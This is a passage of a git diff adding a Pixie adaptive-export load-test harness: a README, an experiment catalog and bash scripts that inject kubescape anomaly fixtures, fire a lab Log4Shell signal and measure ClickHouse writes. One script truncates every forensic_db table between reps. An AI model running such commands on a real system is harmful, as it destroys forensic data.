Fixture-isolation** | No (just ClickHouse) | AE's write behaviour is *deterministic* — injected `kubescape_logs` → exact `forensic_db` rows, across many reps | `harness/run.sh` | +| **B. Live-attack e2e** | Yes (Pixie + kubescape + CH + AE + dx) | the real chain: attack → detection → DX-steered data-volume reduction → no-loss → NFR | `harness/log4shell_fire.sh` → `exp_matrix.sh` → `nfr.sh` → `exp_row_reconcile.sh` | + +`event_time` is unix **SECONDS** end-to-end (the unit the soc Vector kubescape sink emits and the CH DDL TTL/PARTITION assume). Fixtures use seconds. + +--- + +## A. Fixture-isolation (offline AE proof — no Pixie) + +Injects *controlled* `kubescape_logs` trigger rows (real kubescape is **not** deployed) and a *counted* traffic band, then asserts exactly how much AE writes — so write behaviour is measured deterministically instead of lost in infra noise. + +```sh +export KUBECONFIG= # or run lab-side with CH_NO_PF=1 +bash harness/run.sh # full suite: ae_config → E1..E4,E6 → E5 +EXP=E1 REPS=20 OUT=/tmp/E1.csv bash harness/exp_control.sh # one experiment +EXP=E8 TICKS=25 INTERVAL=3 bash harness/exp_e8.sh # sustained same-pod (F8 reproducer) +``` +Exact reproducibility ⇔ `harness/stats.py` reports every `*_act` metric with one distinct value (std=0). + +**Scripts:** `run.sh` (orchestrator) · `lib.sh` (CH/kubectl helpers) · `inject.sh` (HTTP INSERT of kubescape_logs) · `ae_config.sh` (AE single-shot load-test mode) · `exp_control.sh` (E1–E4,E6) · `exp_e5.sh` (data-plane volume) · `exp_e8.sh` (sustained same-pod / F8) · `stats.py` (reproducibility verdict). + +## B. Live-attack e2e (the real chain, on a deployed stack) + +Run on a SOC stack (Pixie vizier Healthy + kubescape netStreaming + CH `forensic_db` + AE + dx). Order: + +```sh +export KUBECONFIG= +# 1. generate the attack signal (idempotent; verifies LDAP egress before returning) +bash harness/log4shell_fire.sh +# 2. data-volume reduction MATRIX — ALL (firehose) vs DX (steered) × {log4shell,argocd,react2argo} +CONDITIONS="log4shell:on react2argo:on" REPS=5 bash harness/exp_matrix.sh +# 3. NFR — throughput, AE+dx memory under load, verdict/query latency +bash harness/nfr.sh +# 4. no-loss — deterministic PEM↔ClickHouse row-level reconciliation for the DX arm +bash harness/exp_row_reconcile.sh +``` + +**Scripts:** `log4shell_fire.sh` (attack-signal generator, bob#140-hardened) · `exp_matrix.sh` (reduction matrix, the canonical ALL-vs-DX runner) · `nfr.sh` (throughput/mem/latency) · `exp_row_reconcile.sh` (no-loss). + +> The DX arm needs the load-gen pods bound to a **benign User SBoB** (`kubescape.io/managed-by: User`, `rulePolicies.R0002.processAllowed`) or benign noise gets steered and contaminates the reduction — see `biz/PoC/log4j/datavolume/denoise_sbobs/`. + +--- + +## Layout +``` +fixtures/EXPERIMENTS.md curated kubescape_logs data-set catalog + expected outputs +harness/ the two families above +k8s/ isolated sinks + per-rep generator pod (no probes) +tools/loadgen/ cleanloadgen + httpsink Go sources + Dockerfile +``` +Go unit/e2e tests for AE live with the service: `src/vizier/services/adaptive_export/internal/{trigger,e2e}/*_test.go`. + +See `CONTRACTS.md` (AE implied contracts) and `FINDINGS_AND_BACKLOG.md` (reproduced findings incl. the F8 watermark-poison bug). + +## Validation status (honest) + +| Experiment | Plane | Status | +|---|---|---| +| E1 single / E2 dedup / E3 fan-out / E4 boundary / E6 restart-idempotency | control | ✅ exactly reproducible (std=0) on a live rig | +| E8 sustained same-pod | control | ✅ reproduced the F8 "writes-stop" bug + recovery | +| E5 volume / E8 data-mode | data | ⏳ authored; pending live validation | +| Live log4j reduction / NFR / no-loss (family B) | data | ✅ validated (aeprod19 + pemdq10 + dx): #33 prefetch verdict 212→18ms; reduction ALL→DX ≫ measured | + +## Removed (consolidation 2026-06) +Redundant variants folded into the canonical scripts above — deleted: `ae_vs_all.sh`, `vrun.sh`, `exp_log4j_reps.sh`, `exp_datavolume_extreme.sh`, `exp_dx_steering_reduction.sh` (→ `exp_matrix.sh`); `exp_ae_nfr_benchmark.sh` (→ `nfr.sh`); `exp_pipeline_reconcile.sh` (→ `exp_row_reconcile.sh`); `exp_dx_validate.sh` (→ `exp_matrix.sh`); `deploy_ae.sh`, `build_gen_image.sh` (superseded by the live stack / kit). diff --git a/src/e2e_test/adaptive_export_loadtest/fixtures/EXPERIMENTS.md b/src/e2e_test/adaptive_export_loadtest/fixtures/EXPERIMENTS.md new file mode 100644 index 00000000000..35629485c37 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/fixtures/EXPERIMENTS.md @@ -0,0 +1,45 @@ +# AE load-test experiment catalog + +Each experiment is a curated `kubescape_logs` data set (injected via `inject.sh`, +real kubescape NOT deployed) plus the deterministic AE output it must produce. +Run each ×100; **exact reproducibility ⇔ every metric has std = 0 / one distinct +value across the 100 reps.** + +Two planes (see `project_ae_repro_planes`): +- **Control plane** — `adaptive_attribution`, `trigger_watermark`: a pure + function of the injected rows. No Pixie, no traffic gen needed. +- **Data plane** — `http_events`/`dns_events`/`pgsql_events`/`conn_stats`: real + Pixie capture of `cleanloadgen`'s sealed band; gen manifest counts are the + oracle. Requires the L3 topology + single-pull AE config. + +Per-rep isolation: unique `--hostname aw--` (control, watermark is +host-partitioned) and unique `--pod gen--` (data, AE's `df.pod` filter +isolates each rep even with overlapping windows). Timestamps are explicit unix +nanos — fixtures NEVER use wall-clock `now()`. + +| # | Plane | Injected data set | Expected (per rep, exact unless noted) | +|---|---|---|---| +| **E1** single anomaly | control | 1 row: rule R0001, target (ns,pod), pid/comm fixed, `event_time=T` | `uniqExact(anomaly_hash)=1`; `adaptive_attribution` FINAL `=1`; watermark `=T` | +| **E2** dedup / extend | control | 10 rows, SAME (pid,comm,pod,ns), distinct ↑ `event_time` (`--count 10`) | hashes `=1`; attribution FINAL `=1` (t_end extended, not multiplied); watermark `=T+9·dt` | +| **E3** fan-out | control | K=8 rows, distinct (pod,ns), 1 each | hashes `=8`; attribution FINAL `=8` | +| **E4** boundary collision | control | 2 rows, identical `event_time`, different RuleID, same target (`--same-time`) | deterministic fingerprint-dedup: both surface (distinct fp), hashes `=1`; watermark `=T` | +| **E5** data-plane volume | data | 1 anomaly, `pod=gen-…`, `event_time=B1` from gen manifest; gen fires HTTP_N=100/DNS_N=100/PGSQL_N=100 in band `[B0,B1]` | `Δhttp_events=100`, `Δdns_events=100`, `Δpgsql_events=100`; `Δattribution=1`; `conn_stats` within tolerance; single-pull (no MergeTree dup inflation) | +| **E6** watermark idempotency | control | inject E1 set, let AE process, restart AE (watermark persisted), re-run | 2nd pass: `Δ` everything `=0` (no double-count) | +| **E7** passthrough A/B | data | canned band; `ADAPTIVE_PASSTHROUGH` 1 then 0, same load+window | exact firehose/filter ratio per table; reproducible across reps | + +## Timestamp coordination (data-plane, E5/E7) + +1. gen fires → sealed band `[B0,B1]` (node clock == Pixie `time_` == kubescape + `event_time`; no skew). +2. inject fixture `--event-time B1 --pod gen--`. +3. AE config: `ADAPTIVE_WINDOW_BEFORE_SEC ≥ (B1−B0)/1e9 + margin` so window start + `≤ B0`; `ADAPTIVE_WINDOW_AFTER_SEC` small → window expires after ONE pull + (protocol tables are plain MergeTree — repeated pulls would re-insert dups). +4. measure forensic_db deltas BEFORE the band ages out of Pixie retention. +5. delete `gen--` (held alive until here so upid resolves). + +## Default knobs + +- `HTTP_N=DNS_N=PGSQL_N=100` (low enough for 100% Pixie sampling, no drops). +- `conn_stats` tolerance: `Δconn ∈ [HTTP_N, HTTP_N+5]` (new-conn-per-req + 1 pg). +- `async_insert=0` on the ingest user so counts are stable at read time. diff --git a/src/e2e_test/adaptive_export_loadtest/harness/ae_config.sh b/src/e2e_test/adaptive_export_loadtest/harness/ae_config.sh new file mode 100755 index 00000000000..1f7782e927f --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/harness/ae_config.sh @@ -0,0 +1,57 @@ +#!/usr/bin/env bash + +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# ae_config.sh — put the live adaptive-export into deterministic load-test mode. +# +# Sets (and rolls out) the env that makes the data-plane write exactly once per +# anomaly window over the full sealed band: +# ADAPTIVE_PUSH_PIXIE_ROWS=true operator pulls + writes protocol tables +# ADAPTIVE_PUSH_REFRESH_SEC=-1 SINGLE-SHOT: one pull per window (only on +# a rebuilt AE image carrying the new knob; +# harmless/ignored on older images) +# ADAPTIVE_WINDOW_BEFORE_SEC=120 window start ≤ band start (band is seconds) +# ADAPTIVE_WINDOW_AFTER_SEC=5 member lifetime — the PRIMARY single-pull +# lever that works on the CURRENTLY-PUBLISHED +# image: 5s < the 30s default refresh, so the +# window expires before any 2nd pull → each +# window written exactly once. +# Also disables async_insert on the ingest user so row counts are stable at read +# time (per the AE per-PG fixes), and applies the PL_CLOUD_ADDR :443 fix. +set -uo pipefail +HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"; source "$HERE/lib.sh" + +DS="${AE_DS:-adaptive-export}" +log "configuring $AE_NS/$DS for single-shot load-test mode" + +k -n "$AE_NS" set env "ds/$DS" \ + ADAPTIVE_PUSH_PIXIE_ROWS=true \ + ADAPTIVE_PUSH_REFRESH_SEC=-1 \ + ADAPTIVE_WINDOW_BEFORE_SEC=120 \ + ADAPTIVE_WINDOW_AFTER_SEC=5 \ + >/dev/null + +# PL_CLOUD_ADDR :443 fix (idempotent) — without it AE crashloops / 0 writes. +CUR="$(k -n "$AE_NS" get cm pl-cloud-config -o jsonpath='{.data.PL_CLOUD_ADDR}' 2>/dev/null || true)" +if [[ -n "$CUR" && "$CUR" != *:* ]]; then + log "patching PL_CLOUD_ADDR $CUR -> ${CUR}:443" + k -n "$AE_NS" patch cm pl-cloud-config --type merge -p "{\"data\":{\"PL_CLOUD_ADDR\":\"${CUR}:443\"}}" >/dev/null +fi + +k -n "$AE_NS" rollout restart "ds/$DS" >/dev/null +k -n "$AE_NS" rollout status "ds/$DS" --timeout=180s +log "AE configured + rolled out" diff --git a/src/e2e_test/adaptive_export_loadtest/harness/exp_control.sh b/src/e2e_test/adaptive_export_loadtest/harness/exp_control.sh new file mode 100755 index 00000000000..783aad584d0 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_control.sh @@ -0,0 +1,115 @@ +#!/usr/bin/env bash + +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# exp_control.sh — control-plane reproducibility (E1..E4, E6). No Pixie, no gen: +# inject curated kubescape_logs fixtures and assert the deterministic control +# surface (adaptive_attribution FINAL + uniqExact(anomaly_hash) + watermark). +# +# Live-AE constraint: hostname MUST be a real node (AE polls per-node). Per-rep +# isolation is by UNIQUE POD (distinct anomaly_hash) + monotone event_time. +# +# Usage: EXP=E1 REPS=100 OUT=/tmp/e1.csv ./exp_control.sh (EXP in E1 E2 E3 E4 E6) +set -uo pipefail +HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"; source "$HERE/lib.sh" +INJECT="$HERE/inject.sh" + +EXP="${EXP:-E1}" +REPS="${REPS:-100}" +NODE="${NODE:-$(first_node)}" +OUT="${OUT:-/tmp/aeload_${EXP}.csv}" + +ch_portforward_up +[[ -n "$NODE" ]] || die "no node resolved (set NODE=)" +log "EXP=$EXP node=$NODE reps=$REPS" +warmup "$NODE" # absorb AE trigger cold-start so rep 1 is steady-state + +inj(){ "$INJECT" --endpoint "$CH_HTTP" --user "$CH_RW_USER" --pass "$CH_RW_PASS" --hostname "$NODE" "$@" >&2; } +# settle: give AE's 250ms trigger poll + write time to land. +settle(){ sleep "${SETTLE_S:-3}"; } + +echo "rep,exp,uniq_exp,uniq_act,attrib_exp,attrib_act,wm_exp,wm_act,pass" | tee "$OUT" +WM_PREV=0 # for monotonicity check (trigger_watermark persists on a ~5s throttle) + +for rep in $(seq 1 "$REPS"); do + # event_time = REAL current second. The trigger watermark is a strict + # high-water-mark (contract C3 / F8): future-dated stamps (BASE+rep*N) push + # the watermark ahead of wall-clock, so later experiments' now-based stamps + # fall BELOW it and are silently dropped. now_s keeps the watermark tracking + # real time → monotone across experiments on the same (per-node) hostname. + T="$(now_s)" + R="$(printf '%03d' "$rep")" # zero-pad → collision-proof LIKE filters + filt=""; uexp=1; aexp=1; wmexp="$T"; idemp="" + case "$EXP" in + E1) # single anomaly + filt="cp-e1-${R}" + inj --ns aeload --pod "$filt" --rule R0001 --pid 1234 --comm java --event-time "$T" || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; } + ;; + E2) # dedup / extend: 10 rows, same target, 1s apart → 1 hash, 1 row + filt="cp-e2-${R}"; wmexp="$((T + 9))" + inj --ns aeload --pod "$filt" --rule R0001 --pid 1234 --comm java --event-time "$T" --count 10 --dt-s 1 || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; } + sleep 8 # let all 10 rows (spanning 9s) be polled before measuring + ;; + E3) # fan-out: 8 distinct pods → 8 hashes. Same event_time (now_s) for all 8 — + # distinct pods → distinct content fingerprints → all 8 surface (boundary + # dedup is per-fingerprint), and the watermark only advances to now_s. + filt="cp-e3-${R}-"; K=8; uexp="$K"; aexp="$K"; wmexp="" + ok=1 + for j in $(seq 1 "$K"); do + inj --ns aeload --pod "${filt}${j}" --rule R0001 --pid "$((1234+j))" --comm java --event-time "$T" || ok=0 + done + [[ "$ok" == 1 ]] || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; } + ;; + E4) # boundary collision: 2 rows, same event_time, different RuleID, same target → 1 hash + filt="cp-e4-${R}" + inj --ns aeload --pod "$filt" --rule R0001 --pid 1234 --comm java --event-time "$T" --same-time || true + inj --ns aeload --pod "$filt" --rule R0010 --pid 1234 --comm java --event-time "$T" --same-time || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; } + ;; + E6) # watermark idempotency across AE restart + filt="cp-e6-${R}" + inj --ns aeload --pod "$filt" --rule R0001 --pid 1234 --comm java --event-time "$T" || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; } + wait_attrib "$NODE" "$filt" 1 20 >/dev/null + a1="$(attrib_count "$NODE" "$filt")" + k -n "$AE_NS" rollout restart "ds/${AE_DS:-adaptive-export}" >/dev/null 2>&1 || true + k -n "$AE_NS" rollout status "ds/${AE_DS:-adaptive-export}" --timeout=180s >/dev/null 2>&1 || true + sleep 8 + # idempotency: attribution still exactly 1 after restart (no double-count) + [[ "$a1" == "1" ]] || idemp="FAIL_idemp_a1=${a1}" + ;; + *) die "unknown EXP=$EXP";; + esac + + # Poll until AE has written the expected attribution rows (steady-state), + # then read the deterministic counts. wm is persistence-throttled (~5s) so it + # is reported + checked for MONOTONICITY only, never a hard gate. + aact="$(wait_attrib "$NODE" "$filt" "$aexp" "${MEAS_TIMEOUT:-25}")" + uact="$(uniq_hashes "$NODE" "$filt")" + wm="$(watermark_of "$NODE")" + + pass="PASS" + [[ "$uact" == "$uexp" ]] || pass="FAIL_uniq" + [[ "$aact" == "$aexp" ]] || pass="${pass}|FAIL_attrib" + [[ -z "$idemp" ]] || pass="${pass}|${idemp}" + # watermark: must never go backwards (persisted value lags but is monotone). + if [[ "${wm:-0}" -lt "${WM_PREV:-0}" ]]; then pass="${pass}|FAIL_wm_regress"; fi + WM_PREV="$wm" + + echo "$rep,$EXP,$uexp,$uact,$aexp,$aact,$wmexp,$wm,$pass" | tee -a "$OUT" +done + +log "$EXP done -> $OUT" +python3 "$HERE/stats.py" "$OUT" || true diff --git a/src/e2e_test/adaptive_export_loadtest/harness/exp_e5.sh b/src/e2e_test/adaptive_export_loadtest/harness/exp_e5.sh new file mode 100755 index 00000000000..d9237672aa5 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_e5.sh @@ -0,0 +1,98 @@ +#!/usr/bin/env bash + +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# exp_e5.sh — E5 live data-plane reproducibility: real Pixie captures a counted, +# sealed, pod-pinned band; AE pulls it ONCE; we assert the forensic_db deltas +# equal the generator's ground truth, across REPS reps. +# +# Output CSV (stdout + $OUT): rep,http_exp,http_act,dns_exp,dns_act,pgsql_exp, +# pgsql_act,conn_est,conn_act,attrib,uniq_hash,wm_exp,wm_act,pass +# +# Usage: REPS=100 HTTP_N=100 DNS_N=100 PGSQL_N=100 OUT=/tmp/e5.csv ./exp_e5.sh +set -uo pipefail +HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"; source "$HERE/lib.sh" +INJECT="$HERE/inject.sh" + +REPS="${REPS:-100}" +HTTP_N="${HTTP_N:-100}"; DNS_N="${DNS_N:-100}"; PGSQL_N="${PGSQL_N:-100}" +CONN_TOL="${CONN_TOL:-5}" # conn_stats tolerance band above HTTP_N+1 +SETTLE_S="${SETTLE_S:-4}" # Stirling flush settle before injecting +PULL_TIMEOUT="${PULL_TIMEOUT:-40}" # max wait for AE single-pull to land +OUT="${OUT:-/tmp/aeload_e5.csv}" + +ch_portforward_up +apply_sinks +# Absorb the AE trigger cold-start on every node (gen pods may land on any node). +for n in $(nodes_list); do warmup "$n"; done + +echo "rep,http_exp,http_act,dns_exp,dns_act,pgsql_exp,pgsql_act,conn_est,conn_act,attrib,uniq_hash,wm_exp,wm_act,pass" | tee "$OUT" + +for rep in $(seq 1 "$REPS"); do + name="gen-e5-$(printf '%03d' "$rep")" # zero-pad → collision-proof LIKE filter + + mani="$(fire_gen "$name" "$HTTP_N" "$DNS_N" "$PGSQL_N")" || { echo "$rep,,,,,,,,,,,,,FIRE_FAIL" | tee -a "$OUT"; continue; } + b1="$(jget "$mani" b1)" # band end, unix NANOS (gen clock) + b1_s=$(( b1 / 1000000000 )) # → unix SECONDS = production event_time unit + http_exp="$(jget "$mani" http)"; dns_exp="$(jget "$mani" dns)"; pgsql_exp="$(jget "$mani" pgsql)" + conn_est="$(jget "$mani" conn_tcp_est)" + # Fixture hostname MUST be the node the gen pod landed on, so the AE pod on + # that node reads the trigger (AE polls kubescape_logs WHERE hostname=node). + node="$(jget "$mani" node)" + [[ -n "$node" ]] || { del_gen "$name"; echo "$rep,,,,,,,,,,,,,NO_NODE" | tee -a "$OUT"; continue; } + + sleep "$SETTLE_S" # let the band flush into Pixie before the window query + + # Inject the single trigger fixture pinned to THIS rep's pod, event_time=B1. + "$INJECT" --endpoint "$CH_HTTP" --user "$CH_RW_USER" --pass "$CH_RW_PASS" \ + --ns "$AELOAD_NS" --pod "$name" --rule R0001 --pid 1234 --comm java \ + --event-time "$b1_s" --hostname "$node" >&2 \ + || { del_gen "$name"; echo "$rep,,,,,,,,,,,,,INJECT_FAIL" | tee -a "$OUT"; continue; } + + # Wait for AE's single pull to land (http_events for this pod reaches exp, or + # timeout). The pod stays alive (held) so upid resolves during the pull. + http_act=0 + for _ in $(seq 1 "$PULL_TIMEOUT"); do + http_act="$(count_pod http_events "$name")" + [[ "$http_act" -ge "$http_exp" ]] && break + sleep 1 + done + dns_act="$(count_pod dns_events "$name")" + pgsql_act="$(count_pod pgsql_events "$name")" + conn_act="$(count_pod conn_stats "$name")" + attrib="$(attrib_count "$node" "$name")" + uhash="$(uniq_hashes "$node" "$name")" + wm_act="$(watermark_of "$node")" + + pass="PASS" + [[ "$http_act" == "$http_exp" ]] || pass="FAIL_http" + [[ "$dns_act" == "$dns_exp" ]] || pass="${pass}|FAIL_dns" + [[ "$pgsql_act" == "$pgsql_exp" ]] || pass="${pass}|FAIL_pgsql" + [[ "$attrib" == "1" ]] || pass="${pass}|FAIL_attrib" + # watermark persists on a ~5s throttle → report only (WARN), don't hard-gate. + [[ "$wm_act" == "$b1_s" ]] || pass="${pass}|WARN_wm" + # conn_stats: tolerance gate (sampled cumulative counters), not exact. + if [[ "$conn_act" -lt "$conn_est" || "$conn_act" -gt $((conn_est + CONN_TOL)) ]]; then + pass="${pass}|WARN_conn" + fi + + echo "$rep,$http_exp,$http_act,$dns_exp,$dns_act,$pgsql_exp,$pgsql_act,$conn_est,$conn_act,$attrib,$uhash,$b1_s,$wm_act,$pass" | tee -a "$OUT" + del_gen "$name" +done + +log "E5 done -> $OUT" +python3 "$HERE/stats.py" "$OUT" || true diff --git a/src/e2e_test/adaptive_export_loadtest/harness/exp_e8.sh b/src/e2e_test/adaptive_export_loadtest/harness/exp_e8.sh new file mode 100755 index 00000000000..e194733f932 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_e8.sh @@ -0,0 +1,98 @@ +#!/usr/bin/env bash + +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# exp_e8.sh — SUSTAINED same-pod-over-time: the bug-hunt for "writes succeed +# initially, then STOP, while the data is still on the Pixie side." +# +# One long-lived pod keeps producing NEW kubescape anomalies over time. A healthy +# AE keeps processing every new anomaly: adaptive_attribution.n_anomalies grows, +# last_seen advances, the active window stays open, and (data mode) protocol rows +# keep being written. A STALL — n_anomalies / last_seen freezing while we keep +# injecting — reproduces the production symptom. +# +# MODE=control (default): inject anomalies + track n_anomalies/last_seen/watermark +# over TICKS. No Pixie needed. Catches a trigger/watermark/dedup-side stall. +# MODE=data: ALSO run a held gen pod producing continuous HTTP/DNS/PGSQL traffic, +# and track per-pod protocol-table row growth (needs a registered vizier). +# +# event_time is unix SECONDS (production unit). BURST>1 injects BURST anomalies at +# the SAME event_time per tick — the realistic "many R0001 in one second" shape +# that probes the watermark-boundary fingerprint dedup (prime suspect). +# +# Usage: MODE=control TICKS=40 INTERVAL=3 BURST=1 OUT=/tmp/e8.csv ./exp_e8.sh +set -uo pipefail +HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"; source "$HERE/lib.sh" +INJECT="$HERE/inject.sh" + +MODE="${MODE:-control}" +TICKS="${TICKS:-40}" +INTERVAL="${INTERVAL:-3}" # seconds between ticks +BURST="${BURST:-1}" # anomalies per tick (same event_time if >1) +NODE="${NODE:-$(first_node)}" +OUT="${OUT:-/tmp/aeload_e8_${MODE}.csv}" +POD="${POD:-sus-$(now_s)}" # the one sustained pod under test + +ch_portforward_up +[[ -n "$NODE" ]] || die "no node resolved" +log "E8 sustained: mode=$MODE node=$NODE pod=$POD ticks=$TICKS interval=${INTERVAL}s burst=$BURST" +warmup "$NODE" + +GEN="" +if [[ "$MODE" == "data" ]]; then + apply_sinks + GEN="$POD" # the gen pod name == the fixture pod (df.pod filter isolates it) + # Long-lived gen that keeps firing: we re-fire by leaving it running and + # re-injecting triggers; the gen's band is its startup burst, but the active + # window re-queries the SAME pod each tick. (Continuous-traffic gen variant is + # a follow-up; this already exercises sustained re-query of one pod.) + fire_gen "$GEN" "${HTTP_N:-100}" "${DNS_N:-100}" "${PGSQL_N:-100}" >/dev/null || die "gen fire failed" + node="$(k -n "$AELOAD_NS" get pod "$GEN" -o jsonpath='{.spec.nodeName}' 2>/dev/null)"; [[ -n "$node" ]] && NODE="$node" + log "data mode: gen $GEN on node $NODE" +fi + +echo "tick,t_unix,event_time,n_anomalies,last_seen,watermark,http_rows,delta_n,status" | tee "$OUT" +prev_n=0 +for tick in $(seq 1 "$TICKS"); do + T="$(now_s)" + # Inject BURST anomalies for the SAME pod at this tick's event_time. + if [[ "$BURST" -gt 1 ]]; then + "$INJECT" --endpoint "$CH_HTTP" --user "$CH_RW_USER" --pass "$CH_RW_PASS" \ + --hostname "$NODE" --ns "$AELOAD_NS" --pod "$POD" --rule R0001 --pid 1234 --comm java \ + --event-time "$T" --count "$BURST" --same-time >&2 || true + else + "$INJECT" --endpoint "$CH_HTTP" --user "$CH_RW_USER" --pass "$CH_RW_PASS" \ + --hostname "$NODE" --ns "$AELOAD_NS" --pod "$POD" --rule R0001 --pid 1234 --comm java \ + --event-time "$T" >&2 || true + fi + sleep "$INTERVAL" + + n="$(attr_field "$NODE" "$POD" n_anomalies)" + ls="$(attr_field "$NODE" "$POD" 'toUnixTimestamp(last_seen)')" + wm="$(watermark_of "$NODE")" + http="0"; [[ "$MODE" == "data" ]] && http="$(count_pod http_events "$POD")" + delta=$(( ${n:-0} - prev_n )) + status="OK" + [[ "$tick" -gt 1 && "$delta" -le 0 ]] && status="STALL" # n_anomalies stopped growing + prev_n="${n:-0}" + echo "$tick,$T,$T,$n,$ls,$wm,$http,$delta,$status" | tee -a "$OUT" +done + +[[ "$MODE" == "data" && -n "$GEN" ]] && del_gen "$GEN" +log "E8 done -> $OUT" +# Summary: did it ever stall, and at which tick? +awk -F, 'NR>1{tot++; if($9=="STALL")stall++} END{printf "[aeload] E8 %s: %d ticks, %d STALL ticks (%s)\n", "'"$MODE"'", tot, stall+0, (stall+0==0?"sustained-OK":"STALLED — reproduces writes-stop")}' "$OUT" diff --git a/src/e2e_test/adaptive_export_loadtest/harness/exp_matrix.sh b/src/e2e_test/adaptive_export_loadtest/harness/exp_matrix.sh new file mode 100755 index 00000000000..de8a068713a --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_matrix.sh @@ -0,0 +1,126 @@ +#!/usr/bin/env bash + +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# exp_matrix.sh — data-volume reduction MATRIX, runs node-side on the rig. +# CONDITIONS = space-list of ATTACK:NOISE (ATTACK=log4shell|argocd|react2argo, NOISE=off|on) +# For each condition: ALL arm (passthrough firehose) then DX arm (streaming), REPS each, +# 2-min window, single fire at t=60s, truncate all CH + settle between reps, measure every +# forensic_db table. Pre-flight AE guard + per-rep attack-fired (R0001) acceptance gate. +# Skips conditions whose workload isn't deployed (logs SKIP) so it does what it can now. +set -uo pipefail +CONDS=${CONDITIONS:-"log4shell:off log4shell:on argocd:off argocd:on react2argo:off react2argo:on"} +REPS=${REPS:-5}; RUNSEC=${RUNSEC:-120}; FIREAT=${FIREAT:-60}; GAP=${GAP:-180} +NS=log4j-poc; CHPOD=chi-forensic-soc-db-soc-cluster-0-0-0 +OUT=/tmp/matrix.txt; RES=/tmp/matrix.tsv +: > "$OUT"; : > "$RES" +chq(){ kubectl -n clickhouse exec "$CHPOD" -c clickhouse -- clickhouse-client -q "$1" 2>/dev/null; } +say(){ echo "[$(date -u +%H:%M:%S)] $*" | tee -a "$OUT"; } +TABLES=$(chq "SELECT name FROM system.tables WHERE database='forensic_db' AND engine LIKE '%MergeTree%' FORMAT TSV") +truncate_all(){ local t; for t in $TABLES; do chq "TRUNCATE TABLE IF EXISTS forensic_db.\`$t\`" >/dev/null 2>&1; done; } +ensure_healthy(){ local p; p=$(kubectl -n pl get vizier -o jsonpath='{.items[*].status.vizierPhase}' 2>/dev/null) + if [ "$p" != Healthy ]; then kubectl -n pl delete pod -l name=vizier-query-broker >/dev/null 2>&1 + for _ in $(seq 1 20); do [ "$(kubectl -n pl get vizier -o jsonpath='{.items[*].status.vizierPhase}' 2>/dev/null)" = Healthy ] && break; sleep 4; done; fi + kubectl -n pl get vizier -o jsonpath='{.items[*].status.vizierPhase}' 2>/dev/null; } +ae_ok(){ local bad; bad=$(kubectl -n pl get pods -l name=adaptive-export --no-headers 2>/dev/null | awk '$3!="Running"{c++} END{print c+0}'); [ "${bad:-1}" -eq 0 ]; } + +# ---- noise (volproof loadgen) ---- +noise(){ if [ "$1" = on ]; then kubectl apply -f /tmp/loadgen.yaml >/dev/null 2>&1; kubectl -n $NS rollout status deploy/volproof-loadgen --timeout=120s >/dev/null 2>&1; say " noise ON (volproof-loadgen)"; + else kubectl -n $NS delete deploy volproof-loadgen --ignore-not-found --wait=false >/dev/null 2>&1; say " noise OFF"; fi; } + +# ---- per-attack workload readiness + fire + R0001 gate ---- +ATTACK="" +ready(){ case "$ATTACK" in + log4shell) kubectl -n $NS get pods --no-headers 2>/dev/null | grep -q '^backend' ;; + argocd) kubectl get ns argocd >/dev/null 